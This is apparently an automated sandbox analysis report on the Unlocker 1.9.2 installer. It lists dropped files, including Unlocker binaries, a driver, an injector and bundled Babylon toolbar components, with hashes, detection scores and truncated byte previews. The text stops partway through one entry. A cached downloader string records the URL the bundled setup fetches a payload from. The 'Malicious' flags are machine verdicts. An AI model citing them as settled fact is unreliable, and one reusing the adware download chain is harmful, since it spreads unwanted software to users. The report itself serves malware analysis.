                                                                                                                                                            SHA-512:9A8E5D36328A796FED7D07E82E45F001EC5891B01B54B47D20D90B6A982D1B8240F9EAB3EDDE7F5D271B3667F54D0AAEF4B21C9D1E50B265E70B3E65EE37573C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Unlocker for Windows 2000, XP, 2003, Vista and 7 both 32 and 64 bits...Copyright (C) 2005-2011 Cedrick Collomb / Empty Loop..unlocker.emptyloop.com....Using Unlocker..--------------....How often have you tried to delete or rename a file or folder and got.."Cannot delete xxx: It is being used by another person or program." ?....Unlocker is a tool which will help you overcoming this scandalous Windows..bug.....Simply right click the file or folder and select Unlocker. If the file..or folder is locked then a window will appear with a list of processes..locking the file or folder. Select the locks and click Unlock and you ..are done.....It is recommended to Unlock wisely and to close open processes locking..files or folder if any, but if only Explorer.exe is the culprit, do not..hesitate! :D....Terms of Use..------------....This software is provided "as is", without any guarantee made..as to its suitability or fitness for any particular use. It may..contain bugs, so use of this tool is at

                                                                                                                                                            C:\Program Files\Unlocker\Unlocker.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):124928
                                                                                                                                                            Entropy (8bit):6.117157328512671
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QjL8UYqusRZHN+R6iJBf232Qxl1D5ljFerDUF7TGMvB+xpgGfGlbPMcpEkAEAG+L://sRZt+R6+232QLADzMvYonfgQ/Y39
                                                                                                                                                            MD5:0A77F732624155A215F5CA54DF9B2930
                                                                                                                                                            SHA1:172BDF71343DD6544CFBE04ABBC3DEC4535F7D84
                                                                                                                                                            SHA-256:A0B651038C4301F70E4AEA506EB90EDC584A5C4CA46880C7DC2AE5EAFA6DC506
                                                                                                                                                            SHA-512:6482C9FC3B5FF9D5798DEB9965B4DFAB9BA62B889E921011696F29DD96B813194A59F76A52A88FA4962317C6A43A21122C857E4CA80C6C4360C2CEE544117352
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q..."..."...".E."..."..."..."..."..."..."..."..."..."Rich..."........PE..d..."..P..........#..........|.................@.....................................................................................................p.......P.......................................................................................................text............................... ..`.data....d..........................@....pdata.......P......................@..@.CRT....(....`......................@..@.rsrc........p......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Program Files\Unlocker\Unlocker.url

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<http://unlocker.emptyloop.com/>), ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):56
                                                                                                                                                            Entropy (8bit):4.431719878492293
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:HRAbABGQYm/2oWtV6JnRyn:HRYFVm/Xo6yn
                                                                                                                                                            MD5:2043E152CBAA21E30B53B6D6C50CD780
                                                                                                                                                            SHA1:544AA2ADF641B1D7330DB20D268308BD9F680917
                                                                                                                                                            SHA-256:2253C9CEB715D173ABAE90D4836A6A506E6049FEF0FC98D1649AB57ED94707AC
                                                                                                                                                            SHA-512:865249F3979BF76C26E1455AEFC3E4B92D0B8259398D068066D3F3B9EF945EE0A78BB7616638092C120337F348A063A22A16857CC86B7450FFE55FDF5638189A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[InternetShortcut]..URL=http://unlocker.emptyloop.com/..

                                                                                                                                                            C:\Program Files\Unlocker\UnlockerCOM.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20032
                                                                                                                                                            Entropy (8bit):6.120916226027237
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:b0cviyVcgoH1a3FveCAmbtQ/o8DhQLMwdYJLygbPbCQW1M6jjDAa:b03nTHsFv+/oih5FLfbCPMmjl
                                                                                                                                                            MD5:5FE324D6C1DC481136742AB5FB8F6672
                                                                                                                                                            SHA1:02F2D4476006CECD771DE3CBE247E432950AE916
                                                                                                                                                            SHA-256:0A66B19BB38385A8879633DCE1272B8ACF1B4B264C88E254345EC249335B41B1
                                                                                                                                                            SHA-512:FAA76477503923D1C14A12F00D7D416E5FBB485560EA02ED1E6EF6337F9AD88BC612AF241EA61C8F9003253CCF5F66B2C7CE4A508BB2ADC761C4F36AC345195D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*../n.~|n.~|n.~|.F.|l.~|.F.|a.~|n..|C.~|I..|o.~|I..|o.~|I..|o.~|I..|o.~|Richn.~|........................PE..d......K.........." ..... ...........".......................................p......................................................@........(.......P..|....@.......4..@....`..(....................................................................................text............ .................. ..`.data...0....0.......$..............@....pdata.......@.......&..............@..@.rsrc...|....P.......(..............@..@.reloc..P....`.......2..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Program Files\Unlocker\UnlockerDriver5.sys

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12352
                                                                                                                                                            Entropy (8bit):6.464105601913163
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:dqD9l0Hvj1+z7PcFVyowJL/W6Mgb5+ebCfYEQpkqs1I5Zgjl50Xe:60HvozjeVYJLygbPbCQW1M6jYXe
                                                                                                                                                            MD5:9DC07E73A4ABB9ACF692113B36A5009F
                                                                                                                                                            SHA1:0C45B0FA0718E5ABA0F21F14178597A1ED3FC208
                                                                                                                                                            SHA-256:CA7176FC219515D58DCFA66EC61880ECE5617275C9B83701BB74D8B60E733D34
                                                                                                                                                            SHA-512:7BB2F07DF990689933B344D2E3061A5E1324ABA011E703130379ED24B253BDD464C9D26B8EFE2D86523F241236FF1B7EDB02919801850BB749849215B1FABF57
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S....................w......q....0;.....0;.....Rich...................PE..d.....K.........."..................0.........@....................................W........................................................A..(....p.......`..........@............................................................@..p............................text...D........................... ..`PAGE......... ...................... ..`INIT....+....0...................... ..`.rdata..R....@......................@..@.data........P......................@....pdata.......`......................@..@.rsrc........p......................@..@........................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Program Files\Unlocker\UnlockerInject32.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11840
                                                                                                                                                            Entropy (8bit):6.714063708551743
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:kpjAiTRs0TjebH947yowJL/W6Mgb5+ebCfYEQpkqs1I5Zgjl5w:kWIsUgHqYJLygbPbCQW1M6jk
                                                                                                                                                            MD5:5B964DBCC99EDEE45A6F235417713A93
                                                                                                                                                            SHA1:E65BB79A470A509A50B4C275C10BC10892AB11CA
                                                                                                                                                            SHA-256:3B1AFEA2711E5D731A60B41E87F4711FE1DB3345FA316BE20347376068479DD5
                                                                                                                                                            SHA-512:60DD41E0434FCC7D6D57A02D69CD47C2B74C9C18316F59AEE88DA087C22C3E8408AA94AB9738EDC1B229DB8F83E620354394AE3847E216C2BCE33DC0D3E62743
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.R...<...<...<.2.G...<...=...<.2.R...<.2.@...<.2.D...<.Rich..<.........................PE..L.../..K............................Q........ ....@..........................@..............................................t...d....0..................@...............................................................\............................text............................... ..`.data........ ......................@....rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Program Files\Unlocker\uninst.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):98302
                                                                                                                                                            Entropy (8bit):6.9288137123184175
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:LLXB65939tY6HBg4sXJH3VRRYia6S+0hyc1tb/ny+ti8wgdK8gM6srLnV+:LLk395hYXJy+Hetb/nsZh8gMJn4
                                                                                                                                                            MD5:CBC4DC3DC6588687641D7FFD626A0156
                                                                                                                                                            SHA1:3BEF23915D9469FD93BDC6DF447DD596D01F233D
                                                                                                                                                            SHA-256:DA85CD2439827EDF0C06E9B5F6780182F50DADB6608512BA86989F6905C5F6D8
                                                                                                                                                            SHA-512:6E0A86A35C6B46BEE9E0D5A1796A360BDF0DB1B79CCB9BCB8F18631EC500350F245C2E11E38C5EA4BE3846017CBFE725FC643F3FAD14695FCD683026D3C5B3C6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................@...............................................s..........hX...........................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc...hX.......Z...t..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Babylon\Setup\Setup2.zpb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3844
                                                                                                                                                            Entropy (8bit):7.9473327809209735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JoZggOWDGmubGYXwfR1ZCeeIV7Bwbuq44oP:yy3WFYXwNneEIA3
                                                                                                                                                            MD5:5E6230B3B16798E23720958756AC6D9E
                                                                                                                                                            SHA1:C7BCB001C48A67D4C9D6E70E92473EBD85B30585
                                                                                                                                                            SHA-256:D49EC47F5D27A09A17E00A6EB78F49A761C9F5881EC81FB07CC49FD0A5F287B2
                                                                                                                                                            SHA-512:6B1C132F0E4FC2CA6B5E8D807671C586D84E044E4DB8380682FD4D071160177C0F7E7A6AFAE3EE74A4FBD5C65ACA0C0876948F5A42DEAFDBB685C5B7989B5AAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.x.......]....L".........=...O...k..#...-Xi;.).s_.!.Ep7.QP..:,D..Z.zK..^.2..@..w.BF.RA-.E.(u.o.}..Z..KV..U..r..%Z....y.2Gg..V^....^..H..e...A.....p...;H9..Q'aU3..m/..'..'.By..I.....A.|...=.h..B'-...>.........(..c...5..?...}...q..S.VN..Ju...v..Z.....]..f...\O].X....P;+^..U.3...t8F."..d._........A..[.TY..,.O.....4A..z...A.Z..b1..Xr.R..!z\..D..v.).Y..JD....G..u^..%.N<..ZG(..\D..J.&....L[..... .../..a.z. }..a..rs)l...-^^...........{..l...v.&...5.)...F?..R.yS.t...=~IF..!.".[`.4V...5..kIZE....qM..#...1...qW.~.....;.K....w.^....{..s.%.U|....ns./9..%..x>CY...V.k.....9y..%.x.KA].T.T....5.;..{".B..M2.....3...2.q..WU}....2..}hyo.5.<3.....4Aa.[..H.`.}...o.....Zu..['...j..\B{.7H..\.*u.....3(..`..b...eRU..,.K=nM..dx.h..o.$...TV.k1.f..3.....?.t.....q...TG.q..a.p......W..?."u].@L.D.P..kY.....^<..`..Xaq~..R.N..A*.{w.=.6..<...Xo'.hc.Ok......*.!}..5..y.e._....)aM...c.j.&M...<"..ML..x....O....m.E.=..W.xx.J.S*[OR..V........\...3.A.CK..AY..XZ.c...m..

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\downloader[1].htm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):274
                                                                                                                                                            Entropy (8bit):5.925546659669212
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:T3C1NyQx7MwvJ043t3wuqzHBa9j4CaJaoQ3yvZR+n:j8x7QAt3JwhWaQCvv+
                                                                                                                                                            MD5:66AC3BAE1AF259D143B7E5B7ED33FCBA
                                                                                                                                                            SHA1:0DBA3F19AA54AFECEEDE904E9CCB9ACBAA7C8CD0
                                                                                                                                                            SHA-256:39192ECB5ED65522CFE1FBFDEF832648036634B856B4A036876746E28E852DF6
                                                                                                                                                            SHA-512:73187D11A31604D3478772B5DA23310D927FAFC5A9EBA44B925B9ADD44B7E56FE05702C6C2888C2D14BAC8CB155BFBE89634562D2DAAA28083CCF1F19FE34E3D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:!-trkInfo=[TType:5012_7];#DQ0BWQFd4nGNiYGZiYGEFYjYgNgFiFiYGZkYHZ&3ikhQ3twjPvOKSHAX9nLx022gfRz&3WAX9xLScEtukxKTi4hIF&dK8TKCKxJwcx5wcBgEwiJ2ruxMA0PcVLQ;#DQyEgeJxjYmBmYmBhBWI2IDYCYi5GVsYGARB41vZ8IgAW5QQg;$http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb;

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Setup2[1].zpb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3844
                                                                                                                                                            Entropy (8bit):7.9473327809209735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JoZggOWDGmubGYXwfR1ZCeeIV7Bwbuq44oP:yy3WFYXwNneEIA3
                                                                                                                                                            MD5:5E6230B3B16798E23720958756AC6D9E
                                                                                                                                                            SHA1:C7BCB001C48A67D4C9D6E70E92473EBD85B30585
                                                                                                                                                            SHA-256:D49EC47F5D27A09A17E00A6EB78F49A761C9F5881EC81FB07CC49FD0A5F287B2
                                                                                                                                                            SHA-512:6B1C132F0E4FC2CA6B5E8D807671C586D84E044E4DB8380682FD4D071160177C0F7E7A6AFAE3EE74A4FBD5C65ACA0C0876948F5A42DEAFDBB685C5B7989B5AAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.x.......]....L".........=...O...k..#...-Xi;.).s_.!.Ep7.QP..:,D..Z.zK..^.2..@..w.BF.RA-.E.(u.o.}..Z..KV..U..r..%Z....y.2Gg..V^....^..H..e...A.....p...;H9..Q'aU3..m/..'..'.By..I.....A.|...=.h..B'-...>.........(..c...5..?...}...q..S.VN..Ju...v..Z.....]..f...\O].X....P;+^..U.3...t8F."..d._........A..[.TY..,.O.....4A..z...A.Z..b1..Xr.R..!z\..D..v.).Y..JD....G..u^..%.N<..ZG(..\D..J.&....L[..... .../..a.z. }..a..rs)l...-^^...........{..l...v.&...5.)...F?..R.yS.t...=~IF..!.".[`.4V...5..kIZE....qM..#...1...qW.~.....;.K....w.^....{..s.%.U|....ns./9..%..x>CY...V.k.....9y..%.x.KA].T.T....5.;..{".B..M2.....3...2.q..WU}....2..}hyo.5.<3.....4Aa.[..H.`.}...o.....Zu..['...j..\B{.7H..\.*u.....3(..`..b...eRU..,.K=nM..dx.h..o.$...TV.k1.f..3.....?.t.....q...TG.q..a.p......W..?."u].@L.D.P..kY.....^<..`..Xaq~..R.N..A*.{w.=.6..<...Xo'.hc.Ok......*.!}..5..y.e._....)aM...c.j.&M...<"..ML..x....O....m.E.=..W.xx.J.S*[OR..V........\...3.A.CK..AY..XZ.c...m..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132096
                                                                                                                                                            Entropy (8bit):6.077194684081875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:aKpmHnzBkCQDQsjqpw/pAsRiYt5+IvNkGNr3jk2zzfrFabmhu5J0tHS+f:aKpmHnCClMSNK+ETHfrFar5J0tF
                                                                                                                                                            MD5:B212865E7E478A28A97268F960079A8D
                                                                                                                                                            SHA1:DED201AE02FB9EA3646489AFEDA49270C4620D9C
                                                                                                                                                            SHA-256:D6138AEF3F7674E2442ADD75013C86CA8FDA3D5BA69737A9B881E7F7BBC730E6
                                                                                                                                                            SHA-512:D973F9CB45D2035A8546BBDF77FA1B239A3F1E4BA2B17D32195A1CFED13FE06AAF48B91A133CEBD7E53481AB5A5E9166329B730587B46A154B193779DA6AD737
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5..w[..w[..w[.....w[.....w[.....w[..%..w[.. ..w[..5..w[..wZ.pw[.....w[.....w[..%..w[.....w[.Rich.w[.........PE..L.....P...........!.....V..........(p.......p...............................`............@.........................`...S.......d.... .......................0.......r..................................@............p......l...`....................text....U.......V.................. ..`.rdata...K...p...L...Z..............@..@.data..../..........................@....SHARDAT. ......."..................@....rsrc........ ......................@..@.reloc... ...0..."..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Babylon.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12384
                                                                                                                                                            Entropy (8bit):5.999166475309639
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:6SqGSumjR7rVILJ7hzEJboFI1BI1x7RpjEie/X6S8k0oP0dNdNhkAU0RSB2rBkEl:iGJmRyJyJb71C1x7R4a+0RSGPB
                                                                                                                                                            MD5:825E5733974586A0A1229A53361ED13E
                                                                                                                                                            SHA1:9EC5B8944C6727FDA6FDC3C18856884554CF6B31
                                                                                                                                                            SHA-256:0A90B96EAF5D92D33B36F73B36B7F9CE3971E5F294DA51ED04DA3FB43DD71A96
                                                                                                                                                            SHA-512:FF039E86873A1014B1F8577AEC9B4230126B41CC204A6911CD372D224B8C07996D4BB2728A06482C5E98FB21F2D525395491F29D428CDD5796A26E372AF5AD4E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Ao...............................d......2.......................................................'...Babylon Trial..........2.............................................................'...Babylon..........2..............'...Englishtown..........2............................................................................'...Babylon..........2....'...Babylon Viewer..........2........................... ......'...Babylon Public..........2........................'..-Babylon Online/Offline Viewer..........2........................'..%Babylon Online Viewer..........2........................'..&Babylon Offline Viewer..........2........................'..&Babylon Premium Viewer..........2................................ ......'..#Babylon-Pro Classic..........2............................................................................'..+Babylon (Corporate Edition)..........2.......................................... ......'.."Babylon (Standard)..........2..............'...Englishtown.......

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\HtmlScreens\loading.html

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):644
                                                                                                                                                            Entropy (8bit):5.2453607077208835
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4WhPHMNUyXUoZhYpNtlVGlKN7HClolEJqNYMxhCRCBRPGu:hMNmMvy4WJHGp/YEaREJNMN5
                                                                                                                                                            MD5:F50FA4673555652289652753183FD1EE
                                                                                                                                                            SHA1:F496797F0D34EB866D6328D2FD1492B485F74D0A
                                                                                                                                                            SHA-256:AFB21B51CEAD30ED14F79293D50B9C3C7A706B5287AAD6CDE06EA44A364DF812
                                                                                                                                                            SHA-512:6E92B13343AD35A8A8C61E54CE3ABB9A28ABEEC4AA8C765326E0D1EC111C7656D8F0F349C44820FB1ABA6730C22F84F7411C0C0B24322BDAA8A977B79BAA23DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 220px;">.. <div>.. <div style="text-align:center; font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_LOADING</div>.. <div style="margin:5px auto; width:32px;">.. <img id="roundProgress" src="pBar.gif" />.. </div>.. </div>.. </div>..</body>..</html>..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\HtmlScreens\navError.html

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926
                                                                                                                                                            Entropy (8bit):5.348370067881831
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4Wh7qJmuMu5+nulOlkkQ2VMCHMNUyXUoZhY+dDNtloNGlomqNt:hMNmMvy4Wa9XlgkkQ+MCHGp/Y+dFzsx5
                                                                                                                                                            MD5:0C464E407C81764EBC09EACBE41F0B3E
                                                                                                                                                            SHA1:245AFE550A05215E5873D8F5F21C22D12AA46B6A
                                                                                                                                                            SHA-256:770A302BC58B513472AA603AE44A365A6F4F8CBDDC13D2692F71B09F143F8A26
                                                                                                                                                            SHA-512:71070FCD243CBB3E4452874ECAF8E20E13CBBBAD0009CE543CA49601FACC1AB1906C298849D3B8FB5747DF1109F8E85946243EC7BFA0EAD97CA0AED9EC8D3DFC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <script type="text/javascript">.. function exitSetup() {... window.external.openPage('{"name":"error"}');...}.. function onXBtnPress() {... exitSetup();... return true;.. }.. </script>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 500px;">.. <div>.. <div style="font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_NAV_ERROR</div>.. <div style="margin:30px auto; width:32px;">.. <input type="button" id="exit" value="BTN_CLOSE" class="BAB_BhvElm" onclick="exitSetup()" style="behavior: url(#default#BabDefBhv:text);" />.. </div>.. </div>.. </div>..</body>..</html>..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\HtmlScreens\pBar.gif

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3208
                                                                                                                                                            Entropy (8bit):7.524069178961416
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:3CwXprsPLjhI4TRpiPDZmjbzpB0IDmkgl/gpx2ugG1LyZtAegoA/3wlSMilKphGa:3J5YPxIRiq/qpx2F3ZtA1oC3TMnphOQ
                                                                                                                                                            MD5:26621CB27BBC94F6BAB3561791AC013B
                                                                                                                                                            SHA1:4010A489350CF59FD8F36F8E59B53E724C49CC5B
                                                                                                                                                            SHA-256:E512D5B772FEF448F724767662E3A6374230157E35CAB6F4226496ACC7AA7AD3
                                                                                                                                                            SHA-512:9A19E8F233113519B22D9F3B205F2A3C1B59669A0431A5C3EF6D7ED66882B93C8582F3BAA13DF4647BCC265D19F7C6543758623044315105479D2533B11F92C6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GIF89a . ......."G....~.....Gh.]|..........6Y.$H..........!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,.... . ......Iia....bK.$.F...R.A.T.,..2S.*05//.m.p!z...0...;$.0C....I*!.HC(A@.o...!39T5.\.8)....`..d..wxG=Y..g...wHb..v.A=.0.V\.\.;........;...H.........0..t%.Hs..rY<H..........b..Z.b.OEg:...GY]..=.A.OQ.s....\b.h.9.=sg...c..e....*...f.7D..!.......,.... . ......IiY...YF5..F..R..Tb.G.J....L..d...&.Ymx...... \...@........ ....1..&R....H..4.1Q..|V..%.z.v...#j0....l.Gg{0~..<.<..[.[.h.x..G...y.........[.0....G.....P.z...h...kz..i....y....h|z.h.G..V.......\h..[........&.+..W.7.8...!..!.......,.... . ......I)1....1G5d].(..R..T2..jL.{..< .[.5.M....0..)... L...I...m..E..`....p..U....^f.%..^.......u.;..zz.}0.X....S0.ew.y.k<..%..O.......z..{....|......%......F.i.1.0......Y.....8.x.....z..@....<...............8..Y<......8.\.P.$...!......!.......,.... . ......I.....g.EU... .R.a.TB.....p>'...e..$.."...\.#E1C.n.....~...J.,..,Aa.....Uw^4.I%P....u.Q.33.{0..i1T

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\IEHelper.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6144
                                                                                                                                                            Entropy (8bit):4.32136921936664
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/JWaDD77eJq0VOs/i5VSweLvuRBUlXVCt6:BT77Gq0ss/4SweoBwk
                                                                                                                                                            MD5:A21DE5067618D4F2DF261416315ED120
                                                                                                                                                            SHA1:7759A3318DE2ABC3755EBB7F50322C6D586B5286
                                                                                                                                                            SHA-256:6D13D2967A37BA76F840CD45DBA565C5D64938A99D886243F01713CD018E53CA
                                                                                                                                                            SHA-512:6B5C40D09A9548FDE90C1B1127A36E813525BEA6FF80D5FB0911DDEF67954B209DF44CBF4714CD00C4E2E4DA90CFC4967DB7174C28F751F7C5B881FA18CC938A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v..............................o.......o.......o......Rich............................PE..L.....P...........!......................... ......................................V}....@..........................#..w...."..P....`.......................p......P ............................................... ..L............................text............................... ..`.rdata....... ......................@..@.data.... ...0......................@....rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132096
                                                                                                                                                            Entropy (8bit):6.077194684081875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:aKpmHnzBkCQDQsjqpw/pAsRiYt5+IvNkGNr3jk2zzfrFabmhu5J0tHS+f:aKpmHnCClMSNK+ETHfrFar5J0tF
                                                                                                                                                            MD5:B212865E7E478A28A97268F960079A8D
                                                                                                                                                            SHA1:DED201AE02FB9EA3646489AFEDA49270C4620D9C
                                                                                                                                                            SHA-256:D6138AEF3F7674E2442ADD75013C86CA8FDA3D5BA69737A9B881E7F7BBC730E6
